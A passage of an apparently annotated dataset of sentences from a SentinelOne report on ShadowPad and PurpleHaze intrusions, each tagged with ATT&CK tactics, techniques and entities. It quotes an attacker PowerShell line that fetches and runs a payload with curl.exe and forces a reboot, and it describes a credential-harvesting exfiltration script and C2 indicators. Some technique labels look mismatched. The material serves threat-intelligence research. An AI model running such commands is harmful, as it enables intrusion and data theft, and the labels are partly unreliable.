SentinelLABS uncovered over 70 victims across sectors such as manufacturing, government, finance, telecommunications, and research.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s25-4ddea5", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 25, "context_before": "Using C2 netflow and SentinelOne telemetry data, SentinelLABS uncovered over 70 victims across sectors such as manufacturing, government, finance, telecommunications, and research.", "sentence_text": "Potentially affected SentinelOne customers were proactively contacted by our Threat Discovery and Response (TDR) teams.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s26-058d0f", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 26, "context_before": "Potentially affected SentinelOne customers were proactively contacted by our Threat Discovery and Response (TDR) teams.", "sentence_text": "One of the impacted entities was an IT services and logistics company, which had been responsible for managing hardware logistics for SentinelOne employees during that period (Activity C).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s27-74726f", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 27, "context_before": "One of the impacted entities was an IT services and logistics company, which had been responsible for managing hardware logistics for SentinelOne employees during that period (Activity C).", "sentence_text": "We attribute these intrusions with high confidence to China-nexus actors, with ongoing efforts aimed at determining the specific threat clusters involved.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s28-4eefb5", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 28, "context_before": "We attribute these intrusions with high confidence to China-nexus actors, with ongoing efforts aimed at determining the specific threat clusters involved.", "sentence_text": "ShadowPad\nis a closed-source modular backdoor platform used by multiple suspected China-nexus threat actors to conduct cyberespionage.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s29-7e6017", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 29, "context_before": "ShadowPad\nis a closed-source modular backdoor platform used by multiple suspected China-nexus threat actors to conduct cyberespionage.", "sentence_text": "Google Threat Intelligence Group has observed the use of ScatterBrain-obfuscated ShadowPad samples since 2022 and attributes them to clusters associated with the suspected Chinese APT umbrella actor APT41.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s30-fee502", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 30, "context_before": "Google Threat Intelligence Group has observed the use of ScatterBrain-obfuscated ShadowPad samples since 2022 and attributes them to clusters associated with the suspected Chinese APT umbrella actor APT41.", "sentence_text": "Overview | The PurpleHaze Activity Cluster In early October 2024, SentinelLABS observed new threat actor activity (Activity D) at the same South Asian government entity compromised using ShadowPad in June 2024 (Activity A).", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "Used ShadowPad to compromise entity's infrastructure", "entities": [ { "text": "PurpleHaze ", "start": 15, "end": 26, "label": "ThreatActor" }, { "text": "ShadowPad ", "start": 187, "end": 197, "label": "MalwareTool" }, { "text": "South Asian government entity", "start": 139, "end": 168, "label": "Infrastructure_Indicator" }, { "text": "compromised ", "start": 169, "end": 181, "label": "Action" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s31-29851b", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 31, "context_before": "Overview | The PurpleHaze Activity Cluster In early October 2024, SentinelLABS observed new threat actor activity (Activity D) at the same South Asian government entity compromised using ShadowPad in June 2024 (Activity A).", "sentence_text": "While these variants exhibit variations in implementation, all share code similarities with the client component of reverse_ssh", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1095", "name": "Non-Application Layer Protocol" }, { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "Use malware from reverse_ssh", "entities": [ { "text": "reverse_ssh", "start": 116, "end": 127, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s32-c532fa", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 32, "context_before": "While these variants exhibit variations in implementation, all share code similarities with the client component of reverse_ssh", "sentence_text": "We track some of the infrastructure used in this intrusion as part of an operational relay box (ORB) network used by several suspected Chinese cyberespionage actors, particularly a threat group that overlaps with public reporting on APT15.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "Used ORB network for intrusions", "entities": [ { "text": "operational relay box (ORB) network", "start": 73, "end": 108, "label": "MalwareTool" }, { "text": "Chinese cyberespionage actors", "start": 135, "end": 164, "label": "Action" }, { "text": "threat group that overlaps with public reporting on APT15", "start": 181, "end": 238, "label": "Action" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s33-1ee144", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 33, "context_before": "We track some of the infrastructure used in this intrusion as part of an operational relay box (ORB) network used by several suspected Chinese cyberespionage actors, particularly a threat group that overlaps with public reporting on APT15.", "sentence_text": "The use of ORB networks is a growing trend among Chinese threat groups, since they can be rapidly expanded to create a dynamic and evolving infrastructure that makes tracking cyberespionage operations and their attribution challenging.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s34-767c97", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 34, "context_before": "The use of ORB networks is a growing trend among Chinese threat groups, since they can be rapidly expanded to create a dynamic and evolving infrastructure that makes tracking cyberespionage operations and their attribution challenging.", "sentence_text": "Our investigation revealed overlaps in the tools used during this intrusion and the October 2024 activity targeting the South Asian government entity (Activity D).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s35-ccf8a0", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 35, "context_before": "Our investigation revealed overlaps in the tools used during this intrusion and the October 2024 activity targeting the South Asian government entity (Activity D).", "sentence_text": "This includes the GOREshell backdoor and publicly available tools developed by The Hacker’s Choice (THC), a community of cybersecurity researchers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s36-57aefd", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 36, "context_before": "This includes the GOREshell backdoor and publicly available tools developed by The Hacker’s Choice (THC), a community of cybersecurity researchers.", "sentence_text": "Activity D and Activity F are the first instances in which we have observed THC tooling used in the context of APT activities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s37-ca8482", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 37, "context_before": "Activity D and Activity F are the first instances in which we have observed THC tooling used in the context of APT activities.", "sentence_text": "We attribute Activity F with high confidence to a China-nexus actor, loosely associating it with a suspected Chinese initial access broker tracked as UNC5174 by Mandiant.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s38-f1aef7", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 38, "context_before": "We attribute Activity F with high confidence to a China-nexus actor, loosely associating it with a suspected Chinese initial access broker tracked as UNC5174 by Mandiant.", "sentence_text": "We acknowledge the possibility that post-intrusion activities may have been conducted by a different threat group.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s39-c9a5f5", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 39, "context_before": "We acknowledge the possibility that post-intrusion activities may have been conducted by a different threat group.", "sentence_text": "The threat actor leveraged ORB network infrastructure, which we assess to be operated from China, and exploited the CVE-2024-8963 vulnerability together with CVE-2024-8190 to establish an initial foothold, a few days before the vulnerabilities were publicly disclosed.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Leveraged ORB network infrastructure, then exploited vulnerabilities to gain initial access", "entities": [ { "text": "ORB network infrastructure", "start": 27, "end": 53, "label": "MalwareTool" }, { "text": "exploited ", "start": 102, "end": 112, "label": "Action" }, { "text": " CVE-2024-8963 vulnerability", "start": 115, "end": 143, "label": "Infrastructure_Indicator" }, { "text": "CVE-2024-8190", "start": 158, "end": 171, "label": "Infrastructure_Indicator" }, { "text": "establish an initial foothold", "start": 175, "end": 204, "label": "Action" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s40-8e3dc0", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 40, "context_before": "The threat actor leveraged ORB network infrastructure, which we assess to be operated from China, and exploited the CVE-2024-8963 vulnerability together with CVE-2024-8190 to establish an initial foothold, a few days before the vulnerabilities were publicly disclosed.", "sentence_text": "This intrusion method suggests the involvement of UNC5174, which is assessed to be a contractor for China’s Ministry of State Security (MSS) primarily focusing on gaining access and specializing in exploiting vulnerabilities in targeted systems.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "UNC5174 focused on gaining access and exploiting vulnerabilities", "entities": [ { "text": "UNC5174", "start": 50, "end": 57, "label": "ThreatActor" }, { "text": "China’s Ministry of State Security (MSS)", "start": 100, "end": 140, "label": "Infrastructure_Indicator" }, { "text": "gaining access", "start": 163, "end": 177, "label": "Action" }, { "text": "exploiting vulnerabilities in targeted systems", "start": 198, "end": 244, "label": "Action" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s41-4c3df9", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 41, "context_before": "This intrusion method suggests the involvement of UNC5174, which is assessed to be a contractor for China’s Ministry of State Security (MSS) primarily focusing on gaining access and specializing in exploiting vulnerabilities in targeted systems.", "sentence_text": "After compromising these systems, UNC5174 is suspected of transferring access to other threat actors.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588", "name": "Obtain Capabilities" } ], "procedure": "Transferring access to other actors", "entities": [ { "text": "UNC5174 ", "start": 34, "end": 42, "label": "ThreatActor" }, { "text": "transferring access", "start": 58, "end": 77, "label": "Action" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s42-d5f1cd", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 42, "context_before": "After compromising these systems, UNC5174 is suspected of transferring access to other threat actors.", "sentence_text": "In January 2025, CISA and the FBI released a joint advisory reporting threat actor activities that also took place in September 2024, involving the chained exploitation of CVE-2024-8963 and CVE-2024-8190, without providing specific attribution assessments.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Exploited infrastructure", "entities": [ { "text": "CVE-2024-8963", "start": 172, "end": 185, "label": "Infrastructure_Indicator" }, { "text": "CVE-2024-8190", "start": 190, "end": 203, "label": "Infrastructure_Indicator" }, { "text": "exploitation ", "start": 156, "end": 169, "label": "Action" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s43-9e84bd", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 43, "context_before": "In January 2025, CISA and the FBI released a joint advisory reporting threat actor activities that also took place in September 2024, involving the chained exploitation of CVE-2024-8963 and CVE-2024-8190, without providing specific attribution assessments.", "sentence_text": "Additionally, Mandiant has observed UNC5174 exploiting the CVE-2023-46747 and CVE-2024-1709 vulnerabilities and deploying a publicly available backdoor tracked as GOREVERSE.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" }, { "id": "T1072", "name": "Software Deployment Tools" } ], "procedure": "Compromised vulnerabilities and deployed GOREVERSE backdoor", "entities": [ { "text": "UNC5174 ", "start": 36, "end": 44, "label": "ThreatActor" }, { "text": "exploiting ", "start": 44, "end": 55, "label": "Action" }, { "text": "CVE-2023-46747", "start": 59, "end": 73, "label": "Infrastructure_Indicator" }, { "text": "CVE-2024-1709", "start": 78, "end": 91, "label": "Infrastructure_Indicator" }, { "text": "GOREVERSE", "start": 163, "end": 172, "label": "MalwareTool" }, { "text": "deploying ", "start": 112, "end": 122, "label": "Action" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s44-6cedf4", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 44, "context_before": "Additionally, Mandiant has observed UNC5174 exploiting the CVE-2023-46747 and CVE-2024-1709 vulnerabilities and deploying a publicly available backdoor tracked as GOREVERSE.", "sentence_text": "We collectively track Activity D, E and F as the PurpleHaze threat cluster.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s45-645b8d", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 45, "context_before": "We collectively track Activity D, E and F as the PurpleHaze threat cluster.", "sentence_text": "We also consider the possibility that access may have been transferred between different actors, particularly in light of the suspected involvement of UNC5174.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588", "name": "Obtain Capabilities" } ], "procedure": "Transferred access between actors", "entities": [ { "text": "access may have been transferred between different actors", "start": 38, "end": 95, "label": "Action" }, { "text": "UNC5174", "start": 151, "end": 158, "label": "ThreatActor" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s46-4dd296", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 46, "context_before": "We also consider the possibility that access may have been transferred between different actors, particularly in light of the suspected involvement of UNC5174.", "sentence_text": "Technical Details |", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s47-c1cdb8", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 47, "context_before": "Technical Details |", "sentence_text": "ShadowPad Intrusions We present below technical details on the ShadowPad intrusion into the South Asian government entity in June 2024 (Activity A), as well as on the broader ShadowPad activities that took place between July 2024 and March 2025 (Activity B and C).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s48-c33b23", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 48, "context_before": "ShadowPad Intrusions We present below technical details on the ShadowPad intrusion into the South Asian government entity in June 2024 (Activity A), as well as on the broader ShadowPad activities that took place between July 2024 and March 2025 (Activity B and C).", "sentence_text": "Activity A | ShadowPad and ScatterBrain Obfuscation This intrusion involved the deployment of a ShadowPad sample named AppSov.exe .", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1610", "name": "Deploy Container" } ], "procedure": "Deployed ShadowPad sample named AppSov.exe", "entities": [ { "text": "ShadowPad ", "start": 13, "end": 23, "label": "MalwareTool" }, { "text": "ScatterBrain Obfuscation", "start": 27, "end": 51, "label": "MalwareTool" }, { "text": "deployment of a ShadowPad sample", "start": 80, "end": 112, "label": "Action" }, { "text": "AppSov.exe", "start": 119, "end": 129, "label": "MalwareTool" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s49-58fe25", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 49, "context_before": "Activity A | ShadowPad and ScatterBrain Obfuscation This intrusion involved the deployment of a ShadowPad sample named AppSov.exe .", "sentence_text": "The threat actor deployed AppSov.exe by executing a PowerShell command that performs the following actions:", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.001", "name": "PowerShell" } ], "procedure": "Deployed AppSov.exe by executing a PowerShell command", "entities": [ { "text": "deployed ", "start": 17, "end": 26, "label": "Action" }, { "text": "AppSov.exe", "start": 26, "end": 36, "label": "MalwareTool" }, { "text": "executing a PowerShell command", "start": 40, "end": 70, "label": "Action" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s50-50f82f", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 50, "context_before": "The threat actor deployed AppSov.exe by executing a PowerShell command that performs the following actions:", "sentence_text": "Downloads a file named x.dat from a remote endpoint using curl.exe after a 60-second delay.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" }, { "id": "T1053.006", "name": "Systemd Timers" } ], "procedure": "Download a file from a remote endpoint using curl.exe.", "entities": [ { "text": "Downloads a file", "start": 0, "end": 16, "label": "Action" }, { "text": "x.dat", "start": 23, "end": 28, "label": "Infrastructure_Indicator" }, { "text": "using curl.exe after a 60-second delay", "start": 52, "end": 90, "label": "Action" }, { "text": "curl.exe", "start": 58, "end": 66, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s51-ad6bf7", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 51, "context_before": "Downloads a file named x.dat from a remote endpoint using curl.exe after a 60-second delay.", "sentence_text": "Saves the downloaded file as AppSov.exe in the C:\\ProgramData\\ directory.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036.008", "name": "Masquerade File Type" }, { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Saves the file as AppSove.exe in the system", "entities": [ { "text": "Saves the downloaded file as AppSov.exe", "start": 0, "end": 39, "label": "Action" }, { "text": "AppSov.exe", "start": 29, "end": 39, "label": "Infrastructure_Indicator" }, { "text": "C:\\ProgramData\\ directory", "start": 47, "end": 72, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s52-d7173e", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 52, "context_before": "Saves the downloaded file as AppSov.exe in the C:\\ProgramData\\ directory.", "sentence_text": "Launches the executable using the Start-Process PowerShell command.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.001", "name": "PowerShell" } ], "procedure": "Launches executable using PowerShell", "entities": [ { "text": "Launches the executable using the Start-Process PowerShell command", "start": 0, "end": 66, "label": "Action" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s53-73361f", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 53, "context_before": "Launches the executable using the Start-Process PowerShell command.", "sentence_text": "Reboots the system after a delay of 30 minutes.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1529", "name": "System Shutdown/Reboot" } ], "procedure": "Reboot the system after a 30-minute delay.", "entities": [ { "text": "Reboots the system", "start": 0, "end": 18, "label": "Action" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s54-40b01c", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 54, "context_before": "Reboots the system after a delay of 30 minutes.", "sentence_text": "sleep 60;curl.exe -o c:\\programdata\\AppSov.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s55-1a08f4", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 55, "context_before": "sleep 60;curl.exe -o c:\\programdata\\AppSov.", "sentence_text": "EXE http://[REDACTED]/dompdf/x.dat;start-process c:\\programdata\\AppSov.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s56-c2e843", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 56, "context_before": "EXE http://[REDACTED]/dompdf/x.dat;start-process c:\\programdata\\AppSov.", "sentence_text": "EXE;sleep 1800;shutdown.exe -r -t 1 -f;\nThe endpoint hosting x.dat was a previously compromised system within the same organization.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s57-d53510", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 57, "context_before": "EXE;sleep 1800;shutdown.exe -r -t 1 -f;\nThe endpoint hosting x.dat was a previously compromised system within the same organization.", "sentence_text": "Our analysis revealed that malware artifacts had been deployed on this system approximately one month prior to the ShadowPad deployment.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Deployed malware artifacts on this system", "entities": [ { "text": "malware artifacts", "start": 27, "end": 44, "label": "MalwareTool" }, { "text": "malware artifacts had been deployed", "start": 27, "end": 62, "label": "Action" }, { "text": "ShadowPad ", "start": 115, "end": 125, "label": "MalwareTool" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s58-320a84", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 58, "context_before": "Our analysis revealed that malware artifacts had been deployed on this system approximately one month prior to the ShadowPad deployment.", "sentence_text": "These include the agent component of the Nimbo-C2 open-source remote access framework, as well as a PowerShell script that performs the following actions:\nCollects sensitive user data (documents, credentials, and cryptographic material) by recursively searching C:\\Users\\ for files modified in the previous 600 days and with the following extensions:\n*.xls,\n*.xlsx,\n*.ods,\n*.txt,\n*.pem,\n*.cert,\n*.pfx\nCopies the collected files to a temporary folder at C:\\windows\\vss\\temp", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1005", "name": "Data from Local System" } ], "procedure": "A script collects sensitive files from user directories and copies them to a temporary location for staging.", "entities": [ { "text": "Nimbo-C2", "start": 41, "end": 49, "label": "MalwareTool" }, { "text": "Collects sensitive user data (documents, credentials, and cryptographic material)", "start": 155, "end": 236, "label": "Action" }, { "text": "Copies the collected files to a temporary folder", "start": 401, "end": 449, "label": "Action" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s59-c30c52", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 59, "context_before": "These include the agent component of the Nimbo-C2 open-source remote access framework, as well as a PowerShell script that performs the following actions:\nCollects sensitive user data (documents, credentials, and cryptographic material) by recursively searching C:\\Users\\ for files modified in the previous 600 days and with the following extensions:\n*.xls\n,\n*.xlsx\n,\n*.ods\n,\n*.txt\n,\n*.pem\n,\n*.cert\n, and\n*.pfx\nCopies the collected files to a temporary folder at C:\\windows\\vss\\temp", "sentence_text": "Archives the collected files into an archive file named with the system’s MAC address and date, likely for tracking compromised endpoints.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1560.001", "name": "Archive via Utility" } ], "procedure": "Archives collected files into an archive file named with the system’s MAC address and date", "entities": [ { "text": "Archives the collected files", "start": 0, "end": 28, "label": "Action" }, { "text": "named with the system’s MAC address and date", "start": 50, "end": 94, "label": "Action" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s60-433f89", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 60, "context_before": "Archives the collected files into an archive file named with the system’s MAC address and date, likely for tracking compromised endpoints.", "sentence_text": "Encrypts and password-protects the archive using 7-Zip with the password @WsxCFt6&UJMmko0 , ensuring the data is obfuscated from inspection.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1001", "name": "Data Obfuscation" } ], "procedure": "Encrypts and puts a password on the archive to obfuscate the file", "entities": [ { "text": "Encrypts and password-protects the archive", "start": 0, "end": 42, "label": "Action" }, { "text": " 7-Zip", "start": 48, "end": 54, "label": "Infrastructure_Indicator" }, { "text": "password @WsxCFt6&UJMmko0", "start": 64, "end": 89, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s61-2c65bb", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 61, "context_before": "Encrypts and password-protects the archive using 7-Zip with the password @WsxCFt6&UJMmko0 , ensuring the data is obfuscated from inspection.", "sentence_text": "Exfiltrates the encrypted archive via a curl POST request to a hardcoded URL:\nRemoves traces by deleting the temporary folder, archive, and DAT files after exfiltration to avoid detection and forensic recovery.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1041", "name": "Exfiltration Over C2 Channel" }, { "id": "T1070.004", "name": "File Deletion" } ], "procedure": "Exfiltrate archive via curl POST request", "entities": [ { "text": "Exfiltrates the encrypted archive", "start": 0, "end": 33, "label": "Action" }, { "text": "curl POST request", "start": 40, "end": 57, "label": "Action" }, { "text": "Removes traces by deleting the temporary folder, archive, and DAT files", "start": 78, "end": 149, "label": "Action" }, { "text": "avoid detection", "start": 172, "end": 187, "label": "Action" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s62-36ccfc", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 62, "context_before": "Exfiltrates the encrypted archive via a curl POST request to a hardcoded URL:\nRemoves traces by deleting the temporary folder, archive, and DAT files after exfiltration to avoid detection and forensic recovery.", "sentence_text": "The Nimbo-C2 agent was deployed to C:\\ProgramData\\Prefetch\\PfSvc.exe , likely masquerading as a Privacyware Privatefirewall executable.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" }, { "id": "T1036", "name": "Masquerading" } ], "procedure": "Deployed malware to directory and masquerading as a legitimate tool", "entities": [ { "text": "Nimbo-C2 agent", "start": 4, "end": 18, "label": "MalwareTool" }, { "text": "deployed ", "start": 23, "end": 32, "label": "Action" }, { "text": " C:\\ProgramData\\Prefetch\\PfSvc.exe", "start": 34, "end": 68, "label": "Infrastructure_Indicator" }, { "text": "masquerading as a Privacyware Privatefirewall executable", "start": 78, "end": 134, "label": "Action" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s63-e3044a", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 63, "context_before": "The Nimbo-C2 agent was deployed to C:\\ProgramData\\Prefetch\\PfSvc.exe , likely masquerading as a Privacyware Privatefirewall executable.", "sentence_text": "We have not previously observed the use of Nimbo-C2 or variants of the PowerShell exfiltration script in the context of suspected Chinese APT activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s64-61e970", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 64, "context_before": "We have not previously observed the use of Nimbo-C2 or variants of the PowerShell exfiltration script in the context of suspected Chinese APT activity.", "sentence_text": "Previous research\nhas documented the use of Nimbo-C2 in operations attributed to APT-K-47 (also known as Mysterious Elephant), a threat actor believed to originate from South Asia.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s65-70f158", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 65, "context_before": "Previous research\nhas documented the use of Nimbo-C2 in operations attributed to APT-K-47 (also known as Mysterious Elephant), a threat actor believed to originate from South Asia.", "sentence_text": "The deployment of the ShadowPad sample AppSov.exe raises several possibilities:\nthe same threat actor conducted both the earlier activity and the ShadowPad deployment, access was handed off to, or leveraged by, a second actor, or two distinct actors operated independently within the same environment.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588", "name": "Obtain Capabilities" } ], "procedure": "Hand off access to a second actor or operate independently in the same environment", "entities": [ { "text": "conducted ", "start": 102, "end": 112, "label": "Action" }, { "text": "ShadowPad", "start": 146, "end": 155, "label": "MalwareTool" }, { "text": "deployment", "start": 156, "end": 166, "label": "Action" }, { "text": "access was handed off to, or leveraged by, a second actor", "start": 168, "end": 225, "label": "Action" }, { "text": "two distinct actors operated independently", "start": 230, "end": 272, "label": "Action" } ] }, { "uid": "sentinel-60_SentinelOne_report-p1-s66-9e7e7a", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 66, "context_before": "The deployment of the ShadowPad sample AppSov.exe raises several possibilities:\nthe same threat actor conducted both the earlier activity and the ShadowPad deployment, access was handed off to, or leveraged by, a second actor, or two distinct actors operated independently within the same environment.", "sentence_text": "AppSov.exe\nwas obfuscated using a variant of ScatterBrain.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-60_SentinelOne_report-p1-s67-9497ff", "source": "sentinel", "doc_id": "60_SentinelOne_report", "page_number": 1, "sentence_id": 67, "context_before": "AppSov.exe\nwas obfuscated using a variant of ScatterBrain.", "sentence_text": "The malware uses the domain news.imaginerjp[.]com and the IP address 65.38.120[.]110 for C2 communication, leveraging DNS over HTTPS (DoH) in an attempt to evade detection by Base-64 encoding queried 